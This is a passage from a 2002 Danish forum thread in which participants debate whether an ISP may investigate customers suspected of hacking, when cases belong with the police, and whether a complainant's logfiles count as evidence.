sker noget kriminelt?? Nej, vel..

Selvfølgelig må en ISP undersøge den trafik der ryger gennem deres
servere og forbindelser. Skulle trafikken så være af kriminel
karakter skal de overlade sagen til politiet.

--
Hygge..
Thomas

<http://carftp.com> - a library of car videos.

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 11:33

Thomas Strandtoft <thomas.strandtoft@anderledes.dk> writes:

>> Mener du ikke: Den eneste myndighed, der MÅ undersøge den
>> sag, er politiet?
>>
>> Der er da ingen tvivl om, at udbyderen KAN undersøge sagen,
>> spørgsmålet er om de MÅ.

>Hvorfor skulle de ikke måtte det?

ISPen kan ikke definere, at der er tale om noget ulovligt. Det
kræver en dom.

>Selvfølgelig må en ISP undersøge den trafik der ryger gennem deres
>servere og forbindelser. Skulle trafikken så være af kriminel
>karakter skal de overlade sagen til politiet.

Det strider mod common-carrier-princippet. ISPen har intet ansvar
for den trafik, der ryger gennem nettet, så længe ingen har gjort
opmærksom på den.

Selv ikke i det tilfælde vil ISPen være den, der anmelder sagen
til politiet. Ikke sædvanligvis i hvert fald.

Mvh.
   Klaus.

Kent Friis (15-09-2002)
Kommentar
Fra : Kent Friis


Dato : 15-09-02 11:46

Den Sun, 15 Sep 2002 10:33:22 +0000 (UTC) skrev Klaus Ellegaard:
>Thomas Strandtoft <thomas.strandtoft@anderledes.dk> writes:
>
>>> Mener du ikke: Den eneste myndighed, der MÅ undersøge den
>>> sag, er politiet?
>>>
>>> Der er da ingen tvivl om, at udbyderen KAN undersøge sagen,
>>> spørgsmålet er om de MÅ.
>
>>Hvorfor skulle de ikke måtte det?
>
>ISPen kan ikke definere, at der er tale om noget ulovligt. Det
>kræver en dom.

Det kan politiet jo så heller ikke (eller har du set for meget Judge
Dredd?)

>>Selvfølgelig må en ISP undersøge den trafik der ryger gennem deres
>>servere og forbindelser. Skulle trafikken så være af kriminel
>>karakter skal de overlade sagen til politiet.
>
>Det strider mod common-carrier-princippet. ISPen har intet ansvar
>for den trafik, der ryger gennem nettet, så længe ingen har gjort
>opmærksom på den.

Startede vi ikke med "så kan du jo klage til ISP'en"? Så er der jo
også nogen der har gjort opmærksom på det.

>Selv ikke i det tilfælde vil ISPen være den, der anmelder sagen
>til politiet. Ikke sædvanligvis i hvert fald.

Måske ikke, men de vil være i stand til at fortælle "jamen det er
helt normalt, du kan bare konfigurere din firewall ordentligt", og
derved undgå en række totalt-tåbelige andmeldelser.

Mvh
Kent
--
F0 0F C7 C8 - Intel Pentium bug

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 11:51

leeloo@phreaker.net (Kent Friis) writes:

>>ISPen kan ikke definere, at der er tale om noget ulovligt. Det
>>kræver en dom.

>Det kan politiet jo så heller ikke (eller har du set for meget Judge
>Dredd?)

Det skriver jeg heller ikke. Men hvis der er mistanke om, at der
er foregået noget ulovligt, lader man politiet undersøge sagen.
Hvis politiet kommer til den konklusion, at sagen kan holde, vil
de sende den til domstolene.

ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
videre med?

>>Det strider mod common-carrier-princippet. ISPen har intet ansvar
>>for den trafik, der ryger gennem nettet, så længe ingen har gjort
>>opmærksom på den.

>Startede vi ikke med "så kan du jo klage til ISP'en"? Så er der jo
>også nogen der har gjort opmærksom på det.

Jep, men der er stadig ingen, der har fået sagen forbi politiet,
og derfor er sagen som udgangspunkt ikke værd at bruge tid på.
Igen: hvis ISPen mener, der sker noget ulovligt, kan ISPen så
dømme kunden efter straffeloven - eller udenom politiet få en
dommer til at se på sagen?

>>Selv ikke i det tilfælde vil ISPen være den, der anmelder sagen
>>til politiet. Ikke sædvanligvis i hvert fald.

>Måske ikke, men de vil være i stand til at fortælle "jamen det er
>helt normalt, du kan bare konfigurere din firewall ordentligt", og
>derved undgå en række totalt-tåbelige andmeldelser.

Ehm... ville det være god kundeservice?

Mvh.
   Klaus.

Kent Friis (15-09-2002)
Kommentar
Fra : Kent Friis


Dato : 15-09-02 12:04

Den Sun, 15 Sep 2002 10:50:45 +0000 (UTC) skrev Klaus Ellegaard:
>leeloo@phreaker.net (Kent Friis) writes:
>
>>>ISPen kan ikke definere, at der er tale om noget ulovligt. Det
>>>kræver en dom.
>
>>Det kan politiet jo så heller ikke (eller har du set for meget Judge
>>Dredd?)
>
>Det skriver jeg heller ikke. Men hvis der er mistanke om, at der
>er foregået noget ulovligt, lader man politiet undersøge sagen.
>Hvis politiet kommer til den konklusion, at sagen kan holde, vil
>de sende den til domstolene.
>
>ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
>så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
>videre med?

Fordi ISP'en ved hvad de snakker om (level 1 supportere måske undtaget)
det er ikke sikkert politiet gør det, afhængig af hvem man får fat i.

>>Måske ikke, men de vil være i stand til at fortælle "jamen det er
>>helt normalt, du kan bare konfigurere din firewall ordentligt", og
>>derved undgå en række totalt-tåbelige andmeldelser.
>
>Ehm... ville det være god kundeservice?

At fortælle kunden at han har misforstået noget, og det ville være
spild af tid at kontakte politiet - ja.

Mvh
Kent
--
Hvis man ikke kan lide klassisk musik, er det sandsynligvis fordi
lydkvaliteten er for dårlig. Klassisk musik kræver et godt anlæg.

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 12:13

leeloo@phreaker.net (Kent Friis) writes:

>>ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
>>så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
>>videre med?

>Fordi ISP'en ved hvad de snakker om (level 1 supportere måske undtaget)
>det er ikke sikkert politiet gør det, afhængig af hvem man får fat i.

ISPer aner ikke noget om politimæssig efterforskning - heller ikke
af IT-relaterede forbrydelser. Så vi vil hellere end gerne overlade
sagen til politiet, der har kompetencen på det felt.

Så kan ISPerne hjælpe politiet i det omfang, politiet gerne vil
have det. Det sker også i udpræget grad i praksis.

>>Ehm... ville det være god kundeservice?

>At fortælle kunden at han har misforstået noget, og det ville være
>spild af tid at kontakte politiet - ja.

Hvis vi snakker portscanninger, er det spild at kontakte politiet -
og spørgsmålet er også, om det overhovedet er ulovligt (omend en
sag fra Nordjylland giver en indikation af, at systematisk scanning
er ulovligt).

Indbrud og lignende kan anmeldes til politiet uanset årsagen til,
at indbruddet lykkedes. Det er indbruddet, der er ulovligt. Det
har intet med årsagen til det at gøre.

Mvh.
   Klaus.

rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 12:58

Klaus Ellegaard wrote:

> ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
> så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
> videre med?

Du springer et link over... Isp'en kan da godt komme videre, de kan gå til
politiet hvis de bliver opmærksomme på "noget" som de mener er eller kunne
være ulovligt.

"Ting" behøver ikke være ulovlige, altså krimminelle, det kan også være
chikanøs adfærd på nettet, misbrug af ISP'ens resourcer, spamming osv , som
i sig selv ikke er ulovlige (måske) men kunne resultere i Clikity clik.

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.



Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 13:09

"rea721" <leon@721.dk> writes:

>Du springer et link over... Isp'en kan da godt komme videre, de kan gå til
>politiet hvis de bliver opmærksomme på "noget" som de mener er eller kunne
>være ulovligt.

Men det gør man som udgangspunkt ikke. Præcis som TeleDanmark ikke
lytter med på tilfædige samtaler for "lige at blive opmærksom på
noget".

Sker det i offentlige rum (chat, news, gæstebøger) er det ikke op
til ISPen - som udgangspunkt - at bestemme, om det er skidt eller
ej. I så fald kunne man jo som ISP melde en bruger til politiet
for æreskrænkelse, fordi en kommentar i dk.snak.mudderkastning gik
lidt for tæt på den paragraf. (Dårligt eksempel, påtaleret og den
slags, men hva')

>"Ting" behøver ikke være ulovlige, altså krimminelle, det kan også være
>chikanøs adfærd på nettet, misbrug af ISP'ens resourcer, spamming osv , som
>i sig selv ikke er ulovlige (måske) men kunne resultere i Clikity clik.

Der er så en stor forskel på de ting: det, du nævner her, er oftest
overtrædelser af ISPens abonnementsbetingelser. Dem har ISPen selv
beføjelser til at påtale. Det har ISPen ikke med straffeloven.

Mvh.
   Klaus.

rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 14:12

Klaus Ellegaard wrote:

> Men det gør man som udgangspunkt ikke. Præcis som TeleDanmark ikke
> lytter med på tilfædige samtaler for "lige at blive opmærksom på
> noget".

Det var ikke pointen. Poienten var at en Internet kunde anmelde et evt
hackingforsøg til pågældene hackers Isp, for at gøre opmærksom på den
hacking. Selv om hacking er ulovlig (ved ikke om det er.. og i hvilke lande)
er det formentlig også en overtrædelse af kundens betingelser.

Jeg gætter selv på at chancen er meget lille for at DK politi vil kontakte
Fransk politi og gøre en sag ud af det, fordi et par hacker knægte leger..
hvorimod en henvendelse til den franske Isp måske vil gøre udslaget. Det er
jo 100% op til Isp hvad de vil gøre.

> Der er så en stor forskel på de ting: det, du nævner her, er oftest
> overtrædelser af ISPens abonnementsbetingelser. Dem har ISPen selv
> beføjelser til at påtale. Det har ISPen ikke med straffeloven.

?? Ikke lige forstået. Hvis vi nu holder os til dette med hacking ol. så kan
jeg ikke umiddelbart finde på nogen ting som skulle være en overtrædelse af
straffeloven og samtidigt _ikke_ være en overtrædelse af en hvilken somhelst
ISP's kundebetingelser, kender du nogen?

Igen, fell free to fut

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.



Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 14:23

"rea721" <leon@721.dk> writes:

>Jeg gætter selv på at chancen er meget lille for at DK politi vil kontakte
>Fransk politi og gøre en sag ud af det, fordi et par hacker knægte leger..

Det skal du ikke være så sikker på. Dog kommer det nok en del an
på omfanget, hvad der bliver gjort ved sagerne.

>hvorimod en henvendelse til den franske Isp måske vil gøre udslaget. Det er
>jo 100% op til Isp hvad de vil gøre.

Ja, men kun hvis det kan dokumenteres. En ISP kan ikke definere,
at kunden hacker. Men hvis der kommer henvendelser, der slet ikke
kan have nogen sammenhæng med hinanden, må ISPen jo spørge kunden,
hvad denne laver. Oftest er det heller ikke kunden, der hacker,
men derimod en trojaner eller lignende, der bruges som mellemled.

Her skal ISPen så igen være forsigtig: ISPen skriver "Hej med dig
- du hacker - hold op med det". Dagen efter kommer politiet og vil
have hackerens computer udleveret. Hvor meget ulovligt er der på
den, og hvor mange skattekroner har politiet spildt på, at ISPen
går og hjælper hackerne med at undgå at blive fanget?

Mvh.
   Klaus.

rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 15:27

Klaus Ellegaard wrote:

>> hvorimod en henvendelse til den franske Isp måske vil gøre udslaget.
>> Det er jo 100% op til Isp hvad de vil gøre.

> Ja, men kun hvis det kan dokumenteres.

Nej. Det er 100% op til Isp _hvad_ de vil gøre... uanset om det kan bevises
eller ej. Hvis de i forvejen har feks 60 klager over samme gut, kan de jo
udemærket cutte ham ved klage nr 60, simpelthen fordi de ikke gider ha ham
som kunde mere.

> En ISP kan ikke definere, at kunden hacker.

En Isp har mig bekendt samme muligheder for at "monitere" en kundes gøren og
laden på nettet uanset om politiet har bedt om det eller ej.. men hvad ved
jeg

> Her skal ISPen så igen være forsigtig: ISPen skriver "Hej med dig
> - du hacker - hold op med det".

Ja det var den lidt simple udlægning. Isp'en kunne jo nøjes med at undersøge
om kunden overtrådte sine abbo betingelser og hendle der udfra.... Ingenting
/ påtale / advarsel / Clikety click eller anmeldelse hvis Isp har fået
begrundet mistanke om noget ulovligt.

> Dagen efter kommer politiet og vil have hackerens
> computer udleveret.

Øhh hvis politiet kommer er der jo nogen der har lavet en anmeldelse, og det
er ISP'en vel ikke videne om med mindre at ISP'en har foretaget anmeldelsen?

> Hvor meget ulovligt er der på den, og hvor mange skattekroner
> har politiet spildt på, at ISPen går og hjælper hackerne med
> at undgå at blive fanget?

Du siger på et tidspunkt at en ISP ikke kan definere om en kunde hacker,
derfor vil ISP'en vel heller ikke påtale dette over for kunden? Og hvis de
rent faktisk _kan_ definere om kunden hacker, og at det rent faktisk _er_
ulovligt, foretager de vel selv en politianmeldelse.
Om politiet spilder skattekroner på en undersøgelse som en ISP er uvidne om,
skal vel ikke forhindre Isp'en i at gøre sit arbejde... uanset hvad de måtte
vælge at gøre?

Men du glippede lige mit sidste spørgsmål i forrige posting.

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.





rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 15:29

rea721 wrote:

> bevises eller ej. Hvis de i forvejen har feks 60 klager over samme
> gut, kan de jo udemærket cutte ham ved klage nr 60,

Doohh [...] ved klage nr 61,

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.


Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 17:10

"rea721" <leon@721.dk> writes:

>> Dagen efter kommer politiet og vil have hackerens
>> computer udleveret.

>Øhh hvis politiet kommer er der jo nogen der har lavet en anmeldelse, og det
>er ISP'en vel ikke videne om med mindre at ISP'en har foretaget anmeldelsen?

Præcis min pointe. Derfor er det drønsvært at vurdere, hvornår man
selv skal kontakte kunden, og hvornår man skal lade det være op til
politiet at håndtere sagen.

>Du siger på et tidspunkt at en ISP ikke kan definere om en kunde hacker,
>derfor vil ISP'en vel heller ikke påtale dette over for kunden?

Ikke at kunden hacker, nej. Man kan have nok så mange mistanker og
på den baggrund kontakte kunden. Ikke for at gøre kunden opmærksom
på, at kunden foretager sig noget ulovligt - men for at pege på en
kedelig trafik fra kundens adresse. Der er væsentlig forskel - også
i hvornår det ene og det andet er en god plan at gøre.

>Og hvis de rent faktisk _kan_ definere om kunden hacker, og at det
>rent faktisk _er_ ulovligt, foretager de vel selv en politianmeldelse.

Det kan man bare ikke i praksis. Det ville kræve enorme ressourcer,
som næppe er noget, ISPerne (læs: kunderne) vil betale for.

Mvh.
   Klaus.

rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 18:47

Klaus Ellegaard wrote:

>> Og hvis de rent faktisk _kan_ definere om kunden hacker, og at det
>> rent faktisk _er_ ulovligt, foretager de vel selv en
>> politianmeldelse.

> Det kan man bare ikke i praksis.

Kan? De vel ikke bare kan, de _skal_ foretage en anmeldelse, hvis de
konstatere en af deres kunder laver noget ulovligt, eller er du ikke enig i
det?

> Det ville kræve enorme ressourcer,
> som næppe er noget, ISPerne (læs: kunderne) vil betale for.

Kan ikke se at resourceforbruget skulle være større for en ISP end en menig
mand at foretage en politianmeldelse _hvis_ der er konstateret noget
ulovligt, men det er måske bare mig.

Nu har du 2 gange krøbet uden om en forklaring på noget af det du skrev som
jeg ikke forstod.. jeg gentager det lige her for nemheds skyld:

> Der er så en stor forskel på de ting: det, du nævner her, er oftest
> overtrædelser af ISPens abonnementsbetingelser. Dem har ISPen selv
> beføjelser til at påtale. Det har ISPen ikke med straffeloven.

?? Ikke lige forstået. Hvis vi nu holder os til dette med hacking ol. så kan
jeg ikke umiddelbart finde på nogen ting som skulle være en overtrædelse af
straffeloven og samtidigt _ikke_ være en overtrædelse af en hvilken somhelst
ISP's kundebetingelser, kender du nogen?


--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.




Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 19:06

"rea721" <leon@721.dk> writes:

>>> Og hvis de rent faktisk _kan_ definere om kunden hacker, og at det
>>> rent faktisk _er_ ulovligt, foretager de vel selv en
>>> politianmeldelse.

>> Det kan man bare ikke i praksis.

>Kan? De vel ikke bare kan, de _skal_ foretage en anmeldelse, hvis de
>konstatere en af deres kunder laver noget ulovligt, eller er du ikke enig i
>det?

Joda, men i og med der ikke foregår en proaktiv overvågning (hvilket
nok i sig selv ville være ulovligt), bliver den slags normalt aldrig
konstateret.

>> Der er så en stor forskel på de ting: det, du nævner her, er oftest
>> overtrædelser af ISPens abonnementsbetingelser. Dem har ISPen selv
>> beføjelser til at påtale. Det har ISPen ikke med straffeloven.

>?? Ikke lige forstået. Hvis vi nu holder os til dette med hacking ol. så kan
>jeg ikke umiddelbart finde på nogen ting som skulle være en overtrædelse af
>straffeloven og samtidigt _ikke_ være en overtrædelse af en hvilken somhelst
>ISP's kundebetingelser, kender du nogen?

Jeg har prøvet at forklare. Hvis en ISP får kendskab til, at en kunde
hacker løs, og vælger at behandle sagen ud fra abonnementsbetingelser,
går hackeren fri. ISPen kan ikke dømme ham, så ISPen kan højst skrive
til kunden, at han skal lade være.

Det viser sig så, at en anden (uden ISPens kendskab) har anmeldt
sagen til politiet. Når politiet et par dage senere kommer ud til
kunden, finder de ingen beviser. Takket være advarslen fra ISPen,
har kunden slettet alle data.

Dermed får alle ofrene heller ikke noget at vide, for ISPen har måske
kun kendskab til ét ud af 100 sites, hackeren har angrebet og måske
endda installeret bagdøre på. Disse 99 andre sites misbruges nu af
andre, og hackeren kan næppe dømmes noget særligt på et vidneudsagn
om én påstået hackersag, som det ikke kan bevises, at hackeren har
fået noget som helst ud af.

Er det en tilfredsstillende løsning på sagen?

Så hellere få det offer, der kontaktede ISPen, til at anmelde sagen
til politiet, så der kan foretages en ordentlig efterforskning af
sagen.

Mvh.
   Klaus.

rea721 (15-09-2002)
Kommentar
Fra : rea721


Dato : 15-09-02 19:49

Klaus Ellegaard wrote:

> Joda,

Ok.

> Er det en tilfredsstillende løsning på sagen?

Jeps, nu har jeg forstået lige precis hvad du mener... Du mener at politiet
skal ind i sagen _fordi_ de er de eneste der reelt kan gøre noget effektivt.

Jeg mener at ISP'en skal kontaktes _fordi_ jeg ikke tror politiet vil ta en
måske så lille sag alvorligt (resourcer / prioritering /andet land osv)...
men sådan er der så meget...

Merci og fortsat hygge

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.



Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 22:06

Klaus Ellegaard wrote:
>
> Er det en tilfredsstillende løsning på sagen?

Nej, men jeg mener kun man kan bebrejde den ISP der kontakter
kunden i stedet for at kontakte politiet. Vi er vel ikke
intereseret i, at politiet skal spilde resourcer på at
behandle hver eneste sag om brug af ping kommandoen? Folk
skulle hellere kontakte en ISP, der burde være lidt bedre
til at sortere i sagerne, og under alle omstændigheder har
nemmere adgang til flere relevante oplysninger.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 22:15

Kasper Dupont <kasperd@daimi.au.dk> writes:

>Nej, men jeg mener kun man kan bebrejde den ISP der kontakter
>kunden i stedet for at kontakte politiet. Vi er vel ikke
>intereseret i, at politiet skal spilde resourcer på at
>behandle hver eneste sag om brug af ping kommandoen? Folk
>skulle hellere kontakte en ISP, der burde være lidt bedre
>til at sortere i sagerne, og under alle omstændigheder har
>nemmere adgang til flere relevante oplysninger.

*Helt* enig. Men så er vi også væk fra den kriminelle side af
sagerne. Portscanninger, ICMP-pakker og den slags er udelukkende
ISPernes opgave.

Mvh.
   Klaus.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 07:10

Klaus Ellegaard wrote:
>
> *Helt* enig. Men så er vi også væk fra den kriminelle side af
> sagerne. Portscanninger, ICMP-pakker og den slags er udelukkende
> ISPernes opgave.

Ja, men ikke alle kunder er i stand til at skelne. Derfor vil
jeg hellere opfordre kunderne til at kontakte deres ISP først.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 15:58

Klaus Ellegaard wrote:
>
> ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
> så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
> videre med?

Hvorfor skulle ISPen spilde politiets tid på en sag, de ikke kan
komme videre med? Situationen er, at en ISP står med en eller
flere anmeldelser om en kunde. Jeg ville aldrig som ISP skride
til en anmeldelse på grundlag af udtalelser, jeg ikke har set
skygen af bevis for.

Hvor meget tillid vil politiet have til en ISP, der gang på gang
kommer med grundløse anmeldelser, fordi de viderbringer dem uden
at først undersøge om der er hold i anklagen?

Hvis der faktisk bliver ingivet en politianmeldelse, er det næste
der sker, at politiet skaffer en dommerkendelse, hvis de mener,
der er grundlag for en undersøgelse. Politiet skal derefter have
ISPens hjælp til at undersøge sagen, fordi det nu engang er ISPen
der har mulighed for at undersøge det.

Skal der virklig gøres så stort et nummer ud af alle anmeldelser
om kunderne, når ISPen nu kunne sortere i dem på forhånd? Hvis
den angrebne person ikke stoler på ISPens håndtering af sagen,
kan man jo altid melde det direkte til politiet. Men det bør man
nok ikke gøre, med mindre man er meget sikker i sin sag.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 17:04

Kasper Dupont <kasperd@daimi.au.dk> writes:

>> ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
>> så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
>> videre med?

>Hvorfor skulle ISPen spilde politiets tid på en sag, de ikke kan
>komme videre med? Situationen er, at en ISP står med en eller
>flere anmeldelser om en kunde. Jeg ville aldrig som ISP skride
>til en anmeldelse på grundlag af udtalelser, jeg ikke har set
>skygen af bevis for.

Vi snakker vist lidt forbi hinanden. Jeg har ikke kendskab til én
eneste sag, hvor en ISP har anmeldt en kunde til politiet. Det er
snarere sådan, at ISPen vurderer, om sagen er en sag for ISPen
eller for politiet. Er det sidstnævnte tilfældet, beder ISPen
kunden om selv at anmelde sagen til politiet.

>Hvis der faktisk bliver ingivet en politianmeldelse, er det næste
>der sker, at politiet skaffer en dommerkendelse, hvis de mener,
>der er grundlag for en undersøgelse. Politiet skal derefter have
>ISPens hjælp til at undersøge sagen, fordi det nu engang er ISPen
>der har mulighed for at undersøge det.

Det er i meget få sager, at politiet skal have ISPens hjælp. Og
stort set aldrig i sager om hacking. Her er efterforskningen pånær
nogle få detaljer koncentreret om brugerens pc.

Hvis vi snakker sager, hvor politiet skal have adgang til kundens
materiale hos ISPen - eller oplysninger om hvem kunden er - er en
dommerkendelse alligevel nødvendig. Ellers overtræder ISPen egne
abonnementsbetingelser (ISPen har forpligtet sig til aldrig at
udlevere kundeoplysninger uden en dommerkendelse).

Mvh.
   Klaus.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 22:14

Klaus Ellegaard wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> >> ISPen kan ikke sende en sådan sag til domstolene udenom politiet,
> >> så hvorfor skulle ISPen spilde tid på en sag, de ikke kan komme
> >> videre med?
>
> >Hvorfor skulle ISPen spilde politiets tid på en sag, de ikke kan
> >komme videre med? Situationen er, at en ISP står med en eller
> >flere anmeldelser om en kunde. Jeg ville aldrig som ISP skride
> >til en anmeldelse på grundlag af udtalelser, jeg ikke har set
> >skygen af bevis for.
>
> Vi snakker vist lidt forbi hinanden. Jeg har ikke kendskab til én
> eneste sag, hvor en ISP har anmeldt en kunde til politiet. Det er
> snarere sådan, at ISPen vurderer, om sagen er en sag for ISPen
> eller for politiet. Er det sidstnævnte tilfældet, beder ISPen
> kunden om selv at anmelde sagen til politiet.

Det synes jeg sådan set også er en udmærket fremgangsmåde:
1) Sagen er vurderet af nogle professioneller personer, inden der
sker en politianmeldelse.
2) ISPen er fri for at skulle foretage en politianmeldelse uden
at kende grundlaget.
3) Når ISPen bliver kontaktet af politet, har de allerede nogle
oplysninger om sagen.

>
> >Hvis der faktisk bliver ingivet en politianmeldelse, er det næste
> >der sker, at politiet skaffer en dommerkendelse, hvis de mener,
> >der er grundlag for en undersøgelse. Politiet skal derefter have
> >ISPens hjælp til at undersøge sagen, fordi det nu engang er ISPen
> >der har mulighed for at undersøge det.
>
> Det er i meget få sager, at politiet skal have ISPens hjælp. Og
> stort set aldrig i sager om hacking. Her er efterforskningen pånær
> nogle få detaljer koncentreret om brugerens pc.

Vil det sige, at politiet skrider til konfiskering af udstyr
udelukkende på grundlag af en anmeldelse og endnu ikke skyggen
af bevis?

>
> Hvis vi snakker sager, hvor politiet skal have adgang til kundens
> materiale hos ISPen - eller oplysninger om hvem kunden er - er en
> dommerkendelse alligevel nødvendig. Ellers overtræder ISPen egne
> abonnementsbetingelser (ISPen har forpligtet sig til aldrig at
> udlevere kundeoplysninger uden en dommerkendelse).

Kender du nogen sager, hvor det ikke var nødvendigt at kontakte
kundens ISP for at få at vide, hvem kunden var?

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 22:19

Kasper Dupont <kasperd@daimi.au.dk> writes:

>Vil det sige, at politiet skrider til konfiskering af udstyr
>udelukkende på grundlag af en anmeldelse og endnu ikke skyggen
>af bevis?

Det ved jeg så ikke. Men hvis de har anmeldelser nok, skal det såmænd
nok være tilfældet.

>Kender du nogen sager, hvor det ikke var nødvendigt at kontakte
>kundens ISP for at få at vide, hvem kunden var?

Næh, jeg hører unægteligt kun om dem, hvor der *er* brug for den
slags information. Det er dog væsentligt nemmere at få den slags
oplysninger, end det er at få en ISP til at etablere overvågning.
Ikke fordi ISPerne ikke vil - men på grund af retsplejeloven.

Mvh.
   Klaus.

Allan Olesen (15-09-2002)
Kommentar
Fra : Allan Olesen


Dato : 15-09-02 23:14

Kasper Dupont <kasperd@daimi.au.dk> wrote:

>Vil det sige, at politiet skrider til konfiskering af udstyr
>udelukkende på grundlag af en anmeldelse og endnu ikke skyggen
>af bevis?

Jeg tillader mig lige at gaa i pernittengryn-mode[1]:
En konfiskation er et resultat af en dom. Naar politiet tager en
PC med til undersoegelse, er det en beslaglaeggelse.

Tilbage til spoergsmaalet:
Du skriver "anmeldelse og endnu ikke skyggen af bevis". Man maa
jo gaa ud fra, at anmeldelsen indeholder en kopi af anmelderens
logfiler. Det er vel sjaeldent, at man har mulighed for at finde
frem til yderligere beviser uden at kigge paa den anmeldtes PC,
saa jeg forstaar ikke helt, hvilke skygger af bevis, du
efterlyser?

Men vi har naturligvis lov at haabe, at anmeldelsen bliver
bedoemt af sagkyndige personer, foer man beslutter at skride til
handling, samt at politiet i saa kort tid som muligt
beslaglaegger akkurat det, som er noedvendigt for undersoegelsen.

Tidligere i traaden blev omtalt en sag med "forkert nummer" i en
ftp-klient. I den sag beslaglagde politiet blandt andet en
flatbed-scanner. Saa kan man spekulere over, hvorvidt den var
noedvendig for undersoegelsen.

[1]: Ok. Indroemmet. Det er nok min default-konfiguration.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 07:17

Allan Olesen wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> wrote:
>
> >Vil det sige, at politiet skrider til konfiskering af udstyr
> >udelukkende på grundlag af en anmeldelse og endnu ikke skyggen
> >af bevis?
>
> Jeg tillader mig lige at gaa i pernittengryn-mode[1]:
> En konfiskation er et resultat af en dom. Naar politiet tager en
> PC med til undersoegelse, er det en beslaglaeggelse.

Jeg kender ikke forskellen på de to ord, det er ikke mit
fagområde.

>
> Tilbage til spoergsmaalet:
> Du skriver "anmeldelse og endnu ikke skyggen af bevis". Man maa
> jo gaa ud fra, at anmeldelsen indeholder en kopi af anmelderens
> logfiler. Det er vel sjaeldent, at man har mulighed for at finde
> frem til yderligere beviser uden at kigge paa den anmeldtes PC,
> saa jeg forstaar ikke helt, hvilke skygger af bevis, du
> efterlyser?

Anmelderens logfiler er ikke ret meget mere bevis end
blot hans udtalelser. Logfilerne beviser intet, de kunne
nemt være forfalskede. (Enten af anmelderen selv, eller
en cracker, der har haft kontrol over maskinen.) Hvis
politiet skal kunne se, at der er hold i anklagen skal
det ske enten ved at overvåge netkommunikationen eller
ved at undersøge angriberens maskine.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Allan Olesen (16-09-2002)
Kommentar
Fra : Allan Olesen


Dato : 16-09-02 07:42

Kasper Dupont <kasperd@daimi.au.dk> wrote:

>Anmelderens logfiler er ikke ret meget mere bevis end
>blot hans udtalelser. Logfilerne beviser intet, de kunne
>nemt være forfalskede.

Enig. Men min pointe var, at det i de fleste tilfaelde maa vaere
alt, politiet har at stoette sig til, naar de skal bede en dommer
om lov til at gaa videre i sagen.

